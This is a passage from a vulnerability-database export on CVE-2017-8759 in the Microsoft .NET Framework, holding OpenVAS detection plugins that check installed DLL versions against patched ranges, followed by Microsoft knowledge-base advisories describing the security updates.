=~ \"(^4\\.6)\")\n {\n if(version_is_less(version:sysdllVer, test_version:\"4.7.2113\")){\n VULN = TRUE ;\n }\n }\n }\n\n ## .NET Framework 4.6/4.6.1/4.6.2/4.7 for Windows 7 and Windows Server 2008 R2\n else if(hotfix_check_sp(win7:2, win7x64:2, win2008r2:2) > 0 &&\n version_in_range(version:sysdllVer, test_version:\"4.6\", test_version2:\"4.7.2113\")){\n VULN = TRUE ;\n }\n\n if(VULN)\n {\n report = 'File checked: ' + dotPath + \"system.dll\" + '\\n' +\n 'File version: ' + sysdllVer + '\\n' +\n 'Vulnerable range: 4.6 - 4.7.2113\\n' ;\n security_message(data:report);\n exit(0);\n }\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-08T13:55:31", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-8759"], "description": "This host is missing a critical security\n update according to Microsoft Security Updates KB4041086.", "modified": "2019-12-20T00:00:00", "published": "2017-09-14T00:00:00", "id": "OPENVAS:1361412562310811829", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811829", "type": "openvas", "title": "Microsoft .NET Framework Remote Code Execution Vulnerability (KB4041086)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft .NET Framework Remote Code Execution Vulnerability (KB4041086)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811829\");\n script_version(\"2019-12-20T10:24:46+0000\");\n script_cve_id(\"CVE-2017-8759\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-12-20 10:24:46 +0000 (Fri, 20 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-09-14 10:52:54 +0530 (Thu, 14 Sep 2017)\");\n script_name(\"Microsoft .NET Framework Remote Code Execution Vulnerability (KB4041086)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft Security Updates KB4041086.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Flaw exists as when Microsoft .NET Framework\n processes untrusted input.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to take control of an affected system. An attacker could then install\n programs, view, change, or delete data, or create new accounts with full user\n rights. Users whose accounts are configured to have fewer user rights on the\n system could be less impacted than users who operate with administrative user\n rights.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft .NET Framework 4.5.2\n\n - Microsoft .NET Framework 4.6\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4041086\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_mandatory_keys(\"SMB/WindowsVersion\");\n script_require_ports(139, 445);\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win2008:3, win2008x64:3) <= 0){\n exit(0);\n}\n\nkey = \"SOFTWARE\\Microsoft\\ASP.NET\\\";\nif(!registry_key_exists(key:key)){\n exit(0);\n}\n\nforeach item (registry_enum_keys(key:key))\n{\n dotPath = registry_get_sz(key:key + item, item:\"Path\");\n if(dotPath && \"\\Microsoft.NET\\Framework\" >< dotPath)\n {\n sysdllVer = fetch_file_version(sysPath:dotPath, file_name:\"system.runtime.remoting.dll\");\n if(!sysdllVer){\n exit(0);\n }\n\n ## .NET Framework 4.6 for Windows Server 2008 x64-based Systems Service Pack 2\n if(hotfix_check_sp(win2008x64:3) > 0 && version_in_range(version:sysdllVer, test_version:\"4.6\", test_version2:\"4.7.2113\"))\n {\n VULN = TRUE ;\n vulnerable_range = \"4.6 - 4.7.2113\";\n }\n\n ## .NET Framework 4.5.2 for Windows Server 2008 32-bit and x64-based Systems Service Pack 2\n else if(version_in_range(version:sysdllVer, test_version:\"4.0.30319.30000\", test_version2:\"4.0.30319.36414\"))\n {\n VULN = TRUE ;\n vulnerable_range = \"4.0.30319.30000 - 4.0.30319.36414\";\n }\n\n if(VULN)\n {\n report = 'File checked: ' + dotPath + \"\\system.runtime.remoting.dll\" + '\\n' +\n 'File version: ' + sysdllVer + '\\n' +\n 'Vulnerable range: ' + vulnerable_range + '\\n' ;\n security_message(data:report);\n exit(0);\n }\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:22:40", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-8759"], "description": "This host is missing an important security\n update according to Microsoft KB4040978", "modified": "2020-06-04T00:00:00", "published": "2017-09-13T00:00:00", "id": "OPENVAS:1361412562310811323", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811323", "type": "openvas", "title": "Microsoft .NET Framework Remote Code Execution Vulnerability (KB4040978)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft .NET Framework Remote Code Execution Vulnerability (KB4040978)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811323\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-8759\");\n script_bugtraq_id(100742);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-09-13 14:22:58 +0530 (Wed, 13 Sep 2017)\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_name(\"Microsoft .NET Framework Remote Code Execution Vulnerability (KB4040978)\");\n\n script_tag(name:\"summary\", value:\"This host is missing an important security\n update according to Microsoft KB4040978\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"A remote code execution vulnerability exists\n when Microsoft .NET Framework processes untrusted input. An attacker who\n successfully exploited this vulnerability in software using the .NET framework\n could take control of an affected system.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to execute code.\");\n\n script_tag(name:\"affected\", value:\"Microsoft .NET Framework 2.0.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4040978\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_mandatory_keys(\"SMB/WindowsVersion\");\n script_require_ports(139, 445);\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win2008:3, win2008x64:3) <= 0){\n exit(0);\n}\n\nkey = \"SOFTWARE\\Microsoft\\ASP.NET\\\";\nif(!registry_key_exists(key:key)){\n exit(0);\n}\n\nforeach item (registry_enum_keys(key:key))\n{\n dotpath = registry_get_sz(key:key + item, item:\"Path\");\n if(dotpath && \"\\Microsoft.NET\\Framework\" >< dotpath)\n {\n dllVer = fetch_file_version(sysPath:dotpath, file_name:\"System.dll\");\n if(dllVer)\n {\n ## .NET Framework 2.0 SP2 for Windows Server 2008 SP2\n if(version_in_range(version:dllVer, test_version:\"2.0.50727.8000\", test_version2:\"2.0.50727.8769\"))\n {\n report = 'File checked: ' + dotpath + \"\\system.dll\" + '\\n' +\n 'File version: ' + dllVer + '\\n' +\n 'Vulnerable range: 2.0.50727.8000 - 2.0.50727.8769' + '\\n' ;\n security_message(data:report);\n exit(0);\n }\n }\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:22:50", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-8759"], "description": "This host is missing an important security\n update according to Microsoft KB4040977", "modified": "2020-06-04T00:00:00", "published": "2017-09-13T00:00:00", "id": "OPENVAS:1361412562310811324", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811324", "type": "openvas", "title": "Microsoft .NET Framework Remote Code Execution Vulnerability (KB4040977)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft .NET Framework Remote Code Execution Vulnerability (KB4040977)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811324\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-8759\");\n script_bugtraq_id(100742);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-09-13 15:08:36 +0530 (Wed, 13 Sep 2017)\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_name(\"Microsoft .NET Framework Remote Code Execution Vulnerability (KB4040977)\");\n\n script_tag(name:\"summary\", value:\"This host is missing an important security\n update according to Microsoft KB4040977\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"A remote code execution vulnerability exists\n when Microsoft .NET Framework processes untrusted input. An attacker who\n successfully exploited this vulnerability in software using the .NET framework\n could take control of an affected system.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to execute code.\");\n\n script_tag(name:\"affected\", value:\"Microsoft .NET Framework 4.5.2.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4040977\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_mandatory_keys(\"SMB/WindowsVersion\");\n script_require_ports(139, 445);\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win2008:3, win2008x64:3, win7:2, win7x64:2, win2008r2:2) <= 0){\n exit(0);\n}\n\nkey = \"SOFTWARE\\Microsoft\\ASP.NET\\\";\nif(!registry_key_exists(key:key)){\n exit(0);\n}\n\nforeach item (registry_enum_keys(key:key))\n{\n dotpath = registry_get_sz(key:key + item, item:\"Path\");\n if(dotpath && \"\\Microsoft.NET\\Framework\" >< dotpath)\n {\n dllVer = fetch_file_version(sysPath:dotpath, file_name:\"System.dll\");\n if(dllVer)\n {\n ## .NET Framework 4.5.2 for Windows 7 SP1, Windows Server 2008 R2 SP1, and\n if(version_in_range(version:dllVer, test_version:\"4.0.30319.36000\", test_version2:\"4.0.30319.36414\"))\n {\n report = 'File checked: ' + dotpath + \"\\system.dll\" + '\\n' +\n 'File version: ' + dllVer + '\\n' +\n 'Vulnerable range: 4.0.30319.36000 - 4.0.30319.36414' + '\\n' ;\n security_message(data:report);\n exit(0);\n }\n }\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:23:20", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-8759"], "description": "This host is missing an important security\n update according to Microsoft KB4040981", "modified": "2020-06-04T00:00:00", "published": "2017-09-13T00:00:00", "id": "OPENVAS:1361412562310811321", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811321", "type": "openvas", "title": "Microsoft .NET Framework Remote Code Execution Vulnerability (KB4040981)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft .NET Framework Remote Code Execution Vulnerability (KB4040981)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811321\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-8759\");\n script_bugtraq_id(100742);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-09-13 13:44:26 +0530 (Wed, 13 Sep 2017)\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_name(\"Microsoft .NET Framework Remote Code Execution Vulnerability (KB4040981)\");\n\n script_tag(name:\"summary\", value:\"This host is missing an important security\n update according to Microsoft KB4040981\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"A remote code execution vulnerability exists\n when Microsoft .NET Framework processes untrusted input. An attacker who\n successfully exploited this vulnerability in software using the .NET framework\n could take control of an affected system.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to execute code.\");\n\n script_tag(name:\"affected\", value:\"Microsoft .NET Framework 3.5.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4040981\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_mandatory_keys(\"SMB/WindowsVersion\");\n script_require_ports(139, 445);\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win8_1:1, win8_1x64:1, win2012R2:1) <= 0){\n exit(0);\n}\n\nkey = \"SOFTWARE\\Microsoft\\ASP.NET\\\";\nif(!registry_key_exists(key:key)){\n exit(0);\n}\n\nforeach item (registry_enum_keys(key:key))\n{\n dotpath = registry_get_sz(key:key + item, item:\"Path\");\n if(dotpath && \"\\Microsoft.NET\\Framework\" >< dotpath)\n {\n dllVer = fetch_file_version(sysPath:dotpath, file_name:\"System.dll\");\n if(dllVer)\n {\n ##.NET Framework 3.5 for Windows Server 2012: September 12, 2017\n if(version_in_range(version:dllVer, test_version:\"2.0.50727.8000\", test_version2:\"2.0.50727.8769\"))\n {\n report = 'File checked: ' + dotpath + \"\\system.dll\" + '\\n' +\n 'File version: ' + dllVer + '\\n' +\n 'Vulnerable range: 2.0.50727.8000 - 2.0.50727.8769' + '\\n' ;\n security_message(data:report);\n exit(0);\n }\n }\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:26:58", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-8759"], "description": "This host is missing an important security\n update according to Microsoft KB4040975", "modified": "2020-06-04T00:00:00", "published": "2017-09-13T00:00:00", "id": "OPENVAS:1361412562310811325", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811325", "type": "openvas", "title": "Microsoft .NET Framework Remote Code Execution Vulnerability (KB4040975)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft .NET Framework Remote Code Execution Vulnerability (KB4040975)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811325\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-8759\");\n script_bugtraq_id(100742);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-09-13 15:16:30 +0530 (Wed, 13 Sep 2017)\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_name(\"Microsoft .NET Framework Remote Code Execution Vulnerability (KB4040975)\");\n\n script_tag(name:\"summary\", value:\"This host is missing an important security\n update according to Microsoft KB4040975\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"A remote code execution vulnerability exists\n when Microsoft .NET Framework processes untrusted input. An attacker who\n successfully exploited this vulnerability in software using the .NET framework\n could take control of an affected system.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to execute code.\");\n\n script_tag(name:\"affected\", value:\"Microsoft .NET Framework 4.5.2.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4040975\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_mandatory_keys(\"SMB/WindowsVersion\");\n script_require_ports(139, 445);\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win2012:1) <= 0){\n exit(0);\n}\n\nkey = \"SOFTWARE\\Microsoft\\ASP.NET\\\";\nif(!registry_key_exists(key:key)){\n exit(0);\n}\n\nforeach item (registry_enum_keys(key:key))\n{\n dotpath = registry_get_sz(key:key + item, item:\"Path\");\n if(dotpath && \"\\Microsoft.NET\\Framework\" >< dotpath)\n {\n dllVer = fetch_file_version(sysPath:dotpath, file_name:\"System.dll\");\n if(dllVer)\n {\n ## .NET Framework 4.5.2 for Windows Server 2012: September 12, 2017\n if(version_in_range(version:dllVer, test_version:\"4.0.30319.36000\", test_version2:\"4.0.30319.36410\"))\n {\n report = 'File checked: ' + dotpath + \"\\system.dll\" + '\\n' +\n 'File version: ' + dllVer + '\\n' +\n 'Vulnerable range: 4.0.30319.36000 - 4.0.30319.36410' + '\\n' ;\n security_message(data:report);\n exit(0);\n }\n }\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "mskb": [{"lastseen": "2021-01-01T22:40:47", "bulletinFamily": "microsoft", "cvelist": ["CVE-2017-8759"], "description": "<html><body><p>Resolves a vulnerability in the Microsoft .NET Framework that could allow remote code execution when the .NET Framework processes untrusted input.</p><h2></h2><div class=\"kb-summary-section section\"><span>\ufeff</span><span>\ufeff</span><a bookmark-id=\"appliestoproducts\" data-content-id=\"\" data-content-type=\"\" href=\"#appliestoproducts\" managed-link=\"\" target=\"\">View products that this article applies to.</a><span>\ufeff</span><span>\ufeff</span><br/></div><h2>Summary</h2><p>This security update resolves a vulnerability in the Microsoft .NET Framework that could allow remote code execution when Microsoft .NET Framework processes untrusted input. An attacker who successfully exploits\u00a0this vulnerability in software by using the .NET Framework could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts that have full user rights. Users whose accounts are configured to have fewer user rights on the system could be less affected than users who operate by using administrative user rights.</p><p>To exploit the vulnerability, an attacker must first convince the user to open a malicious document or application.</p><p><span><span><span>This security update addresses the vulnerability by correcting how the .NET Framework validates untrusted input</span></span></span>. To learn more about this vulnerability, see <a href=\"https://portal.msrc.microsoft.com/security-guidance/advisory/CVE-2017-8759\" id=\"kb-link-2\" target=\"_self\">Microsoft Common Vulnerabilities and Exposures CVE-2017-8759</a>.</p><h2></h2><p><span class=\"text-base\">Important</span></p><ul><li>If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://technet.microsoft.com/en-us/library/hh825699\" managed-link=\"\" target=\"_blank\">Add language packs to Windows</a>.</li></ul><h3><span>Update replacement information</span></h3><p><span><span><span>This update replaces updates <a href=\"https://support.microsoft.com/help/2987128\"><u>2987128</u></a>, and <a href=\"https://support.microsoft.com/help/2978116\"><u>2978116</u></a>.</span></span></span></p><h2>Additional information about this security update</h2><div><span>The following articles contain additional information about this security\u00a0update as it relates to individual product versions.</span></div><div>\u00a0</div><ul><li><span><a data-content-id=\"4040957\" data-content-type=\"article\" href=\"\" managed-link=\"\">4040957</a>\u00a0Description of the Security Only update for the .NET Framework 4.6, 4.6.1, 4.6.2, and 4.7 for Windows 7 SP1 and Windows Server 2008 R2 SP1 and for the .NET Framework 4.6 for Windows Server 2008 SP2: September 12, 2017</span></li><li><a data-content-id=\"4040960\" data-content-type=\"article\" href=\"\" managed-link=\"\">4040960</a>\u00a0Description of the Security Only update for the .NET Framework 4.5.2 for Windows 7 SP1, Windows Server 2008 R2 SP1 and Windows Server 2008 SP2: September 12, 2017</li><li><a data-content-id=\"4040964\" data-content-type=\"article\" href=\"\" managed-link=\"\">4040964</a>\u00a0Description of the Security Only update for the .NET Framework 2.0 SP2 for Windows Server 2008 SP2: September 12, 2017</li></ul><h2>How to obtain help and support for this security update</h2><ul><li><span>Help for installing updates: <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://support.microsoft.com/en-us/help/12373/windows-update-faq\" managed-link=\"\" target=\"_blank\">Windows Update FAQ</a></span></li><li><span>Security solutions for IT professionals: </span><a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://technet.microsoft.com/security/bb980617.aspx\" managed-link=\"\" target=\"_blank\">TechNet Security Support and Troubleshooting</a></li><li><span>Help for protecting your Windows-based products and services from viruses and malware: </span><a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://support.microsoft.com/contactus/cu_sc_virsec_master\" managed-link=\"\" target=\"_blank\">Microsoft Secure</a></li><li><span>Local support according to your country: <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://support.microsoft.com\" managed-link=\"\" target=\"_blank\">International Support</a></span></li></ul><h2>Applies to</h2><div><span><span>\ufeff</span>This article applies to the following:</span></div><p>\u00a0</p><ul><li>Microsoft .NET Framework 2.0 SP2, 4.5.2, and 4.6 when used with:<ul><li>Windows Server 2008 Service Pack 2</li></ul></li></ul><div>\u00a0</div></body></html>", "edition": 3, "modified": "2017-09-12T17:17:18", "id": "KB4041093", "href": "https://support.microsoft.com/en-us/help/4041093/", "published": "2017-09-12T00:00:00", "title": "Security Only update for the .NET Framework 2.0 SP2, 4.5.2, and 4.6 for Windows Server 2008 SP2: September 12, 2017", "type": "mskb", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T22:48:22", "bulletinFamily": "microsoft", "cvelist": ["CVE-2017-8759"], "description": "<html><body><p>Resolves a vulnerability in the Microsoft .NET Framework that could allow remote code execution when Microsoft .NET Framework processes untrusted input.</p><h2></h2><div class=\"kb-summary-section section\"><span class=\"rangySelectionBoundary\" id=\"selectionBoundary_1485014600600_09450835418803427\">\ufeff</span><span class=\"rangySelectionBoundary\" id=\"selectionBoundary_1485014605100_1781047559935547\">\ufeff</span><a bookmark-id=\"appliestoproducts\" data-content-id=\"\" data-content-type=\"\" href=\"#appliestoproducts\" managed-link=\"\" target=\"\">View products that this article applies to.</a><span class=\"rangySelectionBoundary\" id=\"selectionBoundary_1485014605100_7626286965278781\">\ufeff</span><span class=\"rangySelectionBoundary\" id=\"selectionBoundary_1485014600599_5976545847215549\">\ufeff</span><br/></div><h2>Summary</h2><p>This security update resolves a vulnerability in the Microsoft .NET Framework that could allow remote code execution when Microsoft .NET Framework processes untrusted input. An attacker who successfully exploits\u00a0this vulnerability in software by using the .NET Framework could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts that have full user rights. Users whose accounts are configured to have fewer user rights on the system could be less affected than users who operate by using administrative user rights.</p><p>To exploit the vulnerability, an attacker must first convince the user to open a malicious document or application.</p><p><span><span><span>This security update addresses the vulnerability by correcting how the .NET Framework validates untrusted input</span></span></span>. To learn more about this vulnerability, see <a href=\"https://portal.msrc.microsoft.com/security-guidance/advisory/CVE-2017-8759\" id=\"kb-link-2\" target=\"_self\">Microsoft Common Vulnerabilities and Exposures CVE-2017-8759</a>.</p><h2></h2><p><span class=\"text-base\">Important</span></p><ul><li>If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://technet.microsoft.com/en-us/library/hh825699\" managed-link=\"\" target=\"_blank\">Add language packs to Windows</a>.</li></ul><h3>Update replacement information</h3><p><span><span><span>This update replaces updates <a href=\"https://support.microsoft.com/help/2978120\">2978120</a>, and <a href=\"https://support.microsoft.com/help/2978128\">2978128</a>.</span></span></span></p><h2>Additional information about this security update</h2><div><span>The following articles contain additional information about this security update as it relates to individual product versions. The articles may contain known issue information.</span></div><div>\u00a0</div><ul><li><span><a data-content-id=\"4040973\" data-content-type=\"article\" href=\"\" managed-link=\"\">4040973</a>\u00a0Description of the Security and Quality Rollup for the .NET Framework 4.6, 4.6.1, 4.6.2, and 4.7 for Windows 7 SP1 and Windows Server 2008 R2 SP1 and for the .NET Framework 4.6 for Windows Server 2008 SP2: September 12, 2017</span></li><li><a data-content-id=\"4040977\" data-content-type=\"article\" href=\"\" managed-link=\"\">4040977</a>\u00a0Description of the Security and Quality Rollup for the .NET Framework 4.5.2 for Windows 7 SP1, 